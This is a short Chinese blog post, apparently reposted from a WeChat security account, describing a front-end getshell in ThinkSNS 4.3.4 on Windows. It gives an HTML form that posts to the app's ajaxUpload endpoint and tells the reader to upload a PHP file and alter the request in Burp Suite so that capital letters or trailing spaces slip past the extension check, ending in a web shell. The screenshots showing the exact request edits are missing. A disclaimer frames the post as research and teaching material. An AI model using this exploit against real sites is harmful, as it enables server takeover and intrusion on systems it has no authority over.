这个漏洞只能在windows下使用,因为Linux下的后缀名很严格,所以不能用大写以及加空格来绕过。
先构造一个上传表单:
<html><body>
<form action="http://localhost/thinksns434/index.php?app=public&mod=attach&act=ajaxUpload" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="upfile" id="file" /> <br /><input type="submit" name="submit" value="Submit" /></form>
</body>
</html>
然后呢,随便选择一个php文件,开始上传,同时打开Burpsuite开始抓包改包,其中要更改的地方如下:
然后就可以看到回显了上传文件的保存位置了,如图:
我们试着访问一下,成功getshell:
本文始发于微信公众号(飓风网络安全):Thinksns前台Getshell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论